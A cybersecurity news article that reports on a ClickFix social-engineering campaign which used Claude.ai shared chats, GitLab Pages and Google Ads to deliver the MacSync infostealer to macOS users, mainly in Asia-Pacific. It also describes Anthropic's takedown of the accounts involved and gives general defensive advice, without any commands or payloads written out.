Cybersecurity experts have identified a growing trend where hackers are leveraging reputable AI platforms to conduct advanced social engineering attacks. Recent findings reveal that cybercriminals have been exploiting Claude.ai’s shared chat feature to host harmful ClickFix instructions.
Evolution of ClickFix Tactics
Research by TrendAI uncovers that attackers implemented 106 unique malicious hostnames across six campaign waves over seven weeks. By continuously changing their infrastructure and employing various AI-themed tactics, they aimed to enhance the success of their campaigns.
This operation signifies a shift in ClickFix strategies, moving away from conventional malicious hosting to using trusted platforms like Claude.ai. Initially, the campaign utilized GitLab Pages with over 90 malicious subdomains impersonating popular AI developer tools such as Claude AI and ChatGPT Codex.
Manipulating Trusted Platforms
Hackers used Google Ads to lure technically skilled individuals searching for these AI tools. By doing so, they increased the chances of interaction from users who might be inclined to execute the suggested commands.
Victims were deceived into manually running harmful commands under the guise of software installation or repair. This method bypasses traditional security measures, as users unknowingly execute the payload themselves.
Geographical Targeting and Response
The campaign saw a significant escalation in May 2026 when attackers exploited Claude.ai’s shared chat feature. Malicious ads redirected users to legitimate Claude.ai URLs, avoiding common security warnings and protections.
TrendMicro’s analysis revealed that the payload included the MacSync infostealer, targeting macOS systems and collecting sensitive data. The campaign mainly targeted the Asia-Pacific region, with Taiwan accounting for over 30% of traffic, followed by Japan and Singapore.
In response to these threats, Anthropic has banned malicious accounts and removed harmful shared chats from Claude.ai, implementing further measures to prevent future abuse.
Preventive Measures and Future Outlook
Security analysts warn of a broader trend where legitimate platforms are weaponized for malicious purposes. As AI tools become integral to developer workflows, such exploitations are expected to rise.
Organizations are advised to educate their users about the risks of ClickFix-style attacks, monitor unusual command execution, and deploy robust endpoint detection solutions. Users should exercise caution when installing software from search ads, verify URLs, and avoid executing commands from untrusted sources.
Staying informed and vigilant is crucial as the landscape of cyber threats continues to evolve. Follow us on Google News, LinkedIn, and X for more instant updates on cybersecurity developments.
